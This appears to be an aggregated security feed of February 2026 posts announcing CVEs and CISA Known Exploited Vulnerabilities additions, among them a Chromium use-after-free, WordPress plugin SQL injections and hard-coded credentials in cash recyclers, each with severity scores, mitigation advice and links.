- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2026-2441
Vendor: Google
Product: Chromium
Date Added: 2026-02-17
Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-2441
Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.
##Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.
##updated 2026-02-18T09:32:07
4 posts
⚠️ CVE-2026-2495: HIGH severity SQL Injection in WPNakama WordPress plugin (≤0.6.5) via REST API 'order' param. Unauthenticated attackers may access sensitive DB data. Patch or mitigate immediately! https://radar.offseq.com/threat/cve-2026-2495-cwe-89-improper-neutralization-of-sp-08e20fbb #OffSeq #WordPress #SQLInjection #CVE20262495
##🟠 CVE-2026-2495 - High (7.5)
The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2495/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##⚠️ CVE-2026-2495: HIGH severity SQL Injection in WPNakama WordPress plugin (≤0.6.5) via REST API 'order' param. Unauthenticated attackers may access sensitive DB data. Patch or mitigate immediately! https://radar.offseq.com/threat/cve-2026-2495-cwe-89-improper-neutralization-of-sp-08e20fbb #OffSeq #WordPress #SQLInjection #CVE20262495
##🟠 CVE-2026-2495 - High (7.5)
The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2495/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T06:30:25
2 posts
🟠 CVE-2026-1714 - High (8.6)
The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-1714 - High (8.6)
The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the ...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-1714/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T06:30:25
2 posts
🟠 CVE-2026-2576 - High (7.5)
The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2576/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2576 - High (7.5)
The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the use...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2576/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T00:30:22
2 posts
🟠 CVE-2025-13689 - High (8.8)
IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-13689 - High (8.8)
IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-13689/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-18T00:30:22
2 posts
🟠 CVE-2026-2627 - High (7.8)
A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2627/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-2627 - High (7.8)
A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\Program Files\Common Files\microsoft shared\ink\HID.dll of the component Backup/Restore. The manipulation results in link followi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-2627/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
4 posts
🚨 CVE-2026-23647 (CRITICAL, CVSS 9.3): Hard-coded OS credentials in Glory RBG-100 cash recyclers enable remote admin access via SSH. No patch yet — segment networks & restrict access! Financial orgs in Europe especially at risk. https://radar.offseq.com/threat/cve-2026-23647-cwe-798-use-of-hard-coded-credentia-6b5abde7 #OffSeq #vuln #security
##🔴 CVE-2026-23647 - Critical (9.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23647/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CVE-2026-23647 (CRITICAL, CVSS 9.3): Hard-coded OS credentials in Glory RBG-100 cash recyclers enable remote admin access via SSH. No patch yet — segment networks & restrict access! Financial orgs in Europe especially at risk. https://radar.offseq.com/threat/cve-2026-23647-cwe-798-use-of-hard-coded-credentia-6b5abde7 #OffSeq #vuln #security
##🔴 CVE-2026-23647 - Critical (9.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain hard-coded operating system credentials that allow remote authentication to the underlying Linux system. Multiple local user accounts, including accounts with administrati...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23647/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
4 posts
🔴 CVE-2026-22208 - Critical (9.6)
OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22208/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. https://radar.offseq.com/threat/cve-2026-22208-cwe-749-exposed-dangerous-method-or-4594ea65 #OffSeq #CVE202622208 #infosec
##🔴 CVE-2026-22208 - Critical (9.6)
OpenS100 (the reference implementation S-100 viewer) prior to commit 753cf29 contain a remote code execution vulnerability via an unrestricted Lua interpreter. The Portrayal Engine initializes Lua using luaL_openlibs() without sandboxing or capabi...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-22208/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🚨 CRITICAL: CVE-2026-22208 in OpenS100 (S-100 viewer) enables RCE via unsandboxed Lua. Attackers can embed malicious scripts in S-100 catalogues — risk of full system compromise. Block untrusted imports & monitor. Patch when released. https://radar.offseq.com/threat/cve-2026-22208-cwe-749-exposed-dangerous-method-or-4594ea65 #OffSeq #CVE202622208 #infosec
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2025-67905 - High (8.7)
Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-67905 - High (8.7)
Malwarebytes AdwCleaner before v.8.7.0 runs as Administrator and performs an insecure log file delete operation in which the target location is user-controllable, allowing a non-admin user to escalate privileges to SYSTEM via a symbolic link, a re...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-67905/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2026-23648 - High (7.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23648 - High (7.8)
Glory RBG-100 recycler systems using the ISPK-08 software component contain multiple system binaries with overly permissive file permissions. Several binaries executed by the root user are writable and executable by unprivileged local users. An at...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23648/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
2 posts
🟠 CVE-2026-0929 - High (7.5)
The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0929/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-0929 - High (7.5)
The RegistrationMagic WordPress plugin before 6.0.7.2 does not have proper capability checks, allowing subscribers and above to create forms on the site.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-0929/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T21:32:21
1 posts
🔒 CVE-2026-0829 (HIGH): Frontend File Manager plugin ≤23.5 for WordPress has missing authorization, letting unauthenticated users send site emails & access files. Remove or restrict plugin use until patched! https://radar.offseq.com/threat/cve-2026-0829-cwe-862-missing-authorization-in-fro-323c4855 #OffSeq #WordPress #Vuln #BlueTeam
##updated 2026-02-17T21:32:16
6 posts
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2020-7796
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2020-7796
Vendor: Synacor
Product: Zimbra Collaboration Suite
Date Added: 2026-02-17
Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2020-7796
updated 2026-02-17T21:32:16
6 posts
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2008-0015
CISA added four known vulnerabilities to the KEV catalogue yesterday, if you missed them.
- CVE-2008-0015: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability https://www.cve.org/CVERecord?id=CVE-2008-0015
- CVE-2020-7796: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability https://www.cve.org/CVERecord?id=CVE-2020-7796
- CVE-2024-7694: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-7694
- CVE-2026-2441 Google Chromium CSS Use-After-Free Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-2441 #CISA #vulnerability #Google #Microsoft #Zimbra #Windows
##🚨 [CISA-2026:0217] CISA Adds 4 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0217)
CISA has added 4 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2008-0015 (https://secdb.nttzen.cloud/cve/detail/CVE-2008-0015)
- Name: Microsoft Windows Video ActiveX Control Remote Code Execution Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
⚠️ CVE-2020-7796 (https://secdb.nttzen.cloud/cve/detail/CVE-2020-7796)
- Name: Synacor Zimbra Collaboration Suite (ZCS) Server-Side Request Forgery Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Synacor
- Product: Zimbra Collaboration Suite
- Notes: https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P7 ; https://nvd.nist.gov/vuln/detail/CVE-2020-7796
⚠️ CVE-2024-7694 (https://secdb.nttzen.cloud/cve/detail/CVE-2024-7694)
- Name: TeamT5 ThreatSonar Anti-Ransomware Unrestricted Upload of File with Dangerous Type Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: TeamT5
- Product: ThreatSonar Anti-Ransomware
- Notes: https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/ ; https://www.twcert.org.tw/en/cp-139-8000-e5a5c-2.html ; https://nvd.nist.gov/vuln/detail/CVE-2024-7694
⚠️ CVE-2026-2441 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-2441)
- Name: Google Chromium CSS Use-After-Free Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Google
- Product: Chromium
- Notes: https://chromereleases.googleblog.com/2026/02/stable-channel-update-for-desktop_13.html ; https://nvd.nist.gov/vuln/detail/CVE-2026-2441
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260217 #cisa20260217 #cve_2008_0015 #cve_2020_7796 #cve_2024_7694 #cve_2026_2441 #cve20080015 #cve20207796 #cve20247694 #cve20262441
##CVE ID: CVE-2008-0015
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-17
Notes: https://web.archive.org/web/20110305211119/https://www.microsoft.com/technet/security/bulletin/ms09-032.mspx ; https://nvd.nist.gov/vuln/detail/CVE-2008-0015
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2008-0015
updated 2026-02-17T19:21:56.343000
1 posts
Critical RCE Vulnerability in Airleader Master Industrial Monitoring Systems
Airleader GmbH patched a critical unauthenticated remote code execution vulnerability (CVE-2026-1358) in its Airleader Master platform that could allow attackers to upload arbitrary files and take control of the system.
**Make sure your Airleader Master is isolated from the internet and accessible only from trusted networks. Then plan a very quick update to version 6.386. If you have isolated the equipment you have a bit of breathing room, but don't forget to patch. Any isolation will be breached given enough time.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-rce-vulnerability-in-airleader-master-industrial-monitoring-systems-s-8-1-5-f/gD2P6Ple2L
updated 2026-02-17T18:34:01
2 posts
🟠 CVE-2025-70956 - High (7.5)
A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70956/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70956 - High (7.5)
A State Pollution vulnerability was discovered in the TON Virtual Machine (TVM) before v2025.04. The issue exists in the RUNVM instruction logic (VmState::run_child_vm), which is responsible for initializing child virtual machines. The operation m...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70956/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:33:00
2 posts
1 repos
🔴 CVE-2025-65753 - Critical (9)
An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65753/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🔴 CVE-2025-65753 - Critical (9)
An issue in the TLS certification mechanism of Guardian Gryphon v01.06.0006.22 allows attackers to execute commands as root.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-65753/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-17T18:33:00
2 posts
🟠 CVE-2025-70397 - High (8.8)
jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70397/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2025-70397 - High (8.8)
jizhicms 2.5.6 is vulnerable to SQL Injection in Article/deleteAll and Extmolds/deleteAll via the data parameter.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2025-70397/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
